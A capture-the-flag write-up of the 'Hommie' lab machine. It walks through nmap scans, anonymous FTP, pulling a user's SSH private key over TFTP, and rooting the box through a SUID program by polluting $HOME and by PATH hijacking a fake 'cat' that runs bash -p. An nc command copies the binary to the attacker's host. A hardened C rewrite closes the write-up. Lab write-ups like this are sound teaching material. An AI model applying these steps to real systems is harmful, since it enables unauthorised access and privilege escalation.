HMV Hommie
This is a Linux machine with FTP, SSH, web and TFTP services enabled. Following the hint on the homepage of the web service, we find the id_rsa of user alexia and use it to gain an initial foothold on the system. Then we obtain root's id_rsa by abusing a custom SUID program, which allows us to compromise the system.
Summary
Enumeration
Nmap
Overall
# Nmap 7.98 scan initiated Fri Mar 6 11:24:38 2026 as: nmap -p- --min-rate 3000 -oN overall 192.168.1.96
Nmap scan report for 192.168.1.96
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E5:E3:B7 (Oracle VirtualBox virtual NIC)
# Nmap done at Fri Mar 6 11:24:43 2026 -- 1 IP address (1 host up) scanned in 4.48 seconds
Detail
# Nmap 7.98 scan initiated Fri Mar 6 11:25:03 2026 as: nmap -sC -sV -O -vv -p21,22,80 -oN detail 192.168.1.96
Nmap scan report for 192.168.1.96
Host is up, received arp-response (0.00041s latency).
Scanned at 2026-03-06 11:25:07 CST for 8s
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.1.33
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0               0 Sep 30  2020 index.html
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 c6:27:ab:53:ab:b9:c0:20:37:36:52:a9:60:d3:53:fc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDB7u7KKhG7At4Hcc+14cLowxLnO8KM0ktmdNGlQ3NQTg5ccopYqycES73Ie8F8x8LuGmUf63rAlZb58bR8mU0mv5gK6+DvTfsxu8Qv4RlK8ydOyEVhIFk2mukt99lNMmWiQdJ4WHlcSkHFJ0V0YsUiMIQpI+OJQ7yFFIGvmP9wbfxrDcZHPZVt86NgTQ0vwQB/1phH0+DxMNjsaE25qwJ9MDdEs7XxMj31YsTWwm3nLxBbl7SFmRsUsSchrNDTQ355c0kco7/H5cGqI9xm3x9VNCaQmNYapKezhAaEWqvIfP59SCaa8n6NpuP2kPuGJnqdqYo+sM5l/SoCWEJL5HlL
|   256 48:3b:28:1f:9a:23:da:71:f6:05:0b:a5:a6:c8:b7:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFedEUVwZ/C0itzERPAKuSiTugyl9+eZm4f9TQOujQAwyWHvyyiarpJCCqyaQg2DdQEPVMtO7cA3SpkISgseJlA=
|   256 b3:2e:7c:ff:62:2d:53:dd:63:97:d4:47:72:c8:4e:30 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO5HkrVfk6hVBmA2oAFN8nYRmsoXH+1hUZIuyF0DN/YA
80/tcp open  http    syn-ack ttl 64 nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:E5:E3:B7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=3/6%OT=21%CT=%CU=33527%PV=Y%DS=1%DC=D%G=N%M=080027%TM=
OS:69AA491B%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)
Uptime guess: 46.294 days (since Mon Jan 19 04:21:25 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 6 11:25:15 2026 -- 1 IP address (1 host up) scanned in 12.15 seconds
The FTP service allows anonymous login.
UDPScan
# Nmap 7.98 scan initiated Fri Mar 6 11:25:33 2026 as: nmap -sU --top-ports 32 -oN udpscan 192.168.1.96
Nmap scan report for 192.168.1.96
Host is up (0.00051s latency).
Not shown: 30 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 08:00:27:E5:E3:B7 (Oracle VirtualBox virtual NIC)
# Nmap done at Fri Mar 6 11:26:10 2026 -- 1 IP address (1 host up) scanned in 36.43 seconds
A TFTP service may be listening on UDP port 69 (reported as open|filtered).
Web
There are some interesting hints on the homepage of the web service.
❰curtain❙~/workspace/shooting/hmvm/hommie❱✔≻ curl http://192.168.1.96
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobody
- User
alexia's id_rsa file is exposed somewhere; if I can find it, I can use it to gain a foothold on the system.
Directory enumeration with common.txt turns up nothing else.
FTP
Then I interact with the FTP service as the anonymous user and find index.html and the web root
directory. Since I do not know what language (if any) the backend behind nginx runs, a webshell
does not work there.
❰curtain❙~/workspace/shooting/hmvm/hommie❱✔≻ ftp [email protected]
Connected to 192.168.1.96.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        113          4096 Sep 30  2020 .
drwxr-xr-x    3 0        113          4096 Sep 30  2020 ..
drwxrwxr-x    2 0        113          4096 Sep 30  2020 .web
-rw-r--r--    1 0        0               0 Sep 30  2020 index.html
226 Directory send OK.
ftp> cd .web
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 0        113          4096 Sep 30  2020 .
drwxr-xr-x    3 0        113          4096 Sep 30  2020 ..
-rw-r--r--    1 0        0              99 Sep 30  2020 index.html
TFTP
Last but not least, there is a TFTP service (UDP 69) that, given the hint, may be leaking the id_rsa. I try it and succeed.
❰curtain❙~/workspace/shooting/hmvm/hommie❱✘≻ tftpy_client -H 192.168.1.96 -f id_rsa
[2026-03-06 12:39:18,706] Sending tftp download request to 192.168.1.96
[2026-03-06 12:39:18,707] filename -> id_rsa
[2026-03-06 12:39:18,707] options -> {}
[2026-03-06 12:39:18,708] Transferred 512 bytes
[2026-03-06 12:39:18,708] Set remote port for session to 51853
[2026-03-06 12:39:18,708] Received DAT from server
[2026-03-06 12:39:18,708] Handling DAT packet - block 1
[2026-03-06 12:39:18,708] Sending ack to block 1
[2026-03-06 12:39:18,708] Transferred 1024 bytes
[2026-03-06 12:39:18,709] Handling DAT packet - block 2
[2026-03-06 12:39:18,709] Sending ack to block 2
[2026-03-06 12:39:18,709] Transferred 1536 bytes
[2026-03-06 12:39:18,709] Handling DAT packet - block 3
[2026-03-06 12:39:18,709] Sending ack to block 3
[2026-03-06 12:39:18,709] Transferred 1823 bytes
[2026-03-06 12:39:18,709] Handling DAT packet - block 4
[2026-03-06 12:39:18,709] Sending ack to block 4
[2026-03-06 12:39:18,709] End of file detected
[2026-03-06 12:39:18,709]
[2026-03-06 12:39:18,709] Download complete.
[2026-03-06 12:39:18,709] Downloaded 1823.00 bytes in 0.00 seconds
[2026-03-06 12:39:18,709] Average rate: 6148.85 kbps
[2026-03-06 12:39:18,709] 0.00 bytes in resent data
[2026-03-06 12:39:18,709] Received 0 duplicate packets
❰curtain❙~/workspace/shooting/hmvm/hommie❱✔≻ ls -l id_rsa
-rw------- 1 curtain curtain 1823 Mar 6 12:39 id_rsa
With that id_rsa I log in as user alexia and gain an initial foothold.
Privilege Escalation
While gathering basic information about the system, I find an unusual SUID program.
alexia@hommie:~$ id
uid=1000(alexia) gid=1000(alexia) groups=1000(alexia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
alexia@hommie:~$ cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
alexia:x:1000:1000:alexia,,,:/home/alexia:/bin/bash
alexia@hommie:~$ sudo -l
-bash: sudo: command not found
alexia@hommie:~$ uname -a
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
alexia@hommie:~$ cat /etc/issue
Debian GNU/Linux 10 \n \l
alexia@hommie:~$ find / -mount -perm -u=s 2>/dev/null
/opt/showMetheKey
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount
Then I copy this executable to my own machine with nc (the listener on the attacking host, 192.168.1.33, is started first):
nc -q 2 -lvnp 5555 > showMetheKey
nc -q 2 192.168.1.33 5555 < /opt/showMetheKey
Loading it in IDA, I get:
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setuid(0);
  setgid(0);
  system("cat $HOME/.ssh/id_rsa");
  return 0;
}
So this program "reads out" the id_rsa under whatever $HOME environment variable it is given. The first approach
that comes to mind is to pollute $HOME with /root so that it prints the root user's id_rsa.
Env Pollution
HOME=/root /opt/showMetheKey
Then I log in with that key and become root.
❰curtain❙~/workspace/shooting/hmvm/hommie❱✔≻ ssh -i root_id_rsa [email protected]
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 30 11:03:23 2020
root@hommie:~# id
uid=0(root) gid=0(root) groups=0(root)
root@hommie:~# cat
root@hommie:~# export TERM=xterm
root@hommie:~# ls
note.txt
root@hommie:~# cat note.txt
I dont remember where I stored root.txt !!!
root@hommie:~# pwd
/root
root@hommie:~# find / -type f -name root.txt
/usr/include/root.txt
PATH Hijacking
Notice the quotes around "reads out": what if I hijack the $PATH variable so that cat resolves to bash -p?
Indeed, I get a root shell immediately by executing this program.
alexia@hommie:/tmp$ echo /bin/bash -p > cat
alexia@hommie:/tmp$ cat cat
/bin/bash -p
alexia@hommie:/tmp$ chmod +x cat
alexia@hommie:/tmp$ export PATH=/tmp:$PATH
alexia@hommie:/tmp$ which cat
/tmp/cat
alexia@hommie:/tmp$ /opt/showMetheKey
root@hommie:/tmp# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(alexia)
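Both the $HOME pollution and the $PATH hijacking above work for one reason: a setuid binary calls system() with a command built from the caller's environment. The rewrite below is an added example of how the same "show me the key" logic looks without that mistake; it is not the machine's own binary, and the function names are my own. It takes the home directory from the passwd database instead of getenv("HOME"), copies the file with read()/write() instead of spawning a shell, and drops the setuid(0) entirely, since reading your own key needs no privilege.

```c
/* Added example, not the machine's own binary: a hardened rewrite of the
 * showMetheKey logic. Both tricks in the writeup work because the setuid
 * program trusts the caller's environment: $HOME chooses the file and, via
 * system(), $PATH chooses which "cat" runs. Here the home directory comes
 * from the passwd database and the file is copied with read()/write(), so
 * neither variable matters and no shell is spawned. */
#include <fcntl.h>
#include <pwd.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Build "<home>/.ssh/id_rsa" into buf. Returns the path length, or -1 if
 * home is missing or relative or the result would not fit. */
int key_path_for_home(const char *home, char *buf, size_t len) {
    if (home == NULL || home[0] != '/')
        return -1;
    int n = snprintf(buf, len, "%s/.ssh/id_rsa", home);
    return (n < 0 || (size_t)n >= len) ? -1 : n;
}

/* getuid() is the real (invoking) uid even under setuid, and the passwd
 * entry, unlike getenv("HOME"), is not under the caller's control. */
int key_path_for_caller(char *buf, size_t len) {
    struct passwd *pw = getpwuid(getuid());
    return pw ? key_path_for_home(pw->pw_dir, buf, len) : -1;
}

/* Copy a regular file to stdout with no system() and no $PATH lookup.
 * Returns the number of bytes written, or -1 on any error. */
long dump_file(const char *path) {
    struct stat st; char chunk[4096];
    long total = 0; ssize_t n;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) { close(fd); return -1; }
    while ((n = read(fd, chunk, sizeof chunk)) > 0) {
        if (write(STDOUT_FILENO, chunk, (size_t)n) != n) { close(fd); return -1; }
        total += n;
    }
    close(fd);
    return n < 0 ? -1 : total;
}

int main(void) {
    char path[4096];
    /* No setuid(0): reading your own key needs no extra privilege. */
    if (key_path_for_caller(path, sizeof path) < 0) return 1;
    return dump_file(path) < 0 ? 1 : 0;
}
```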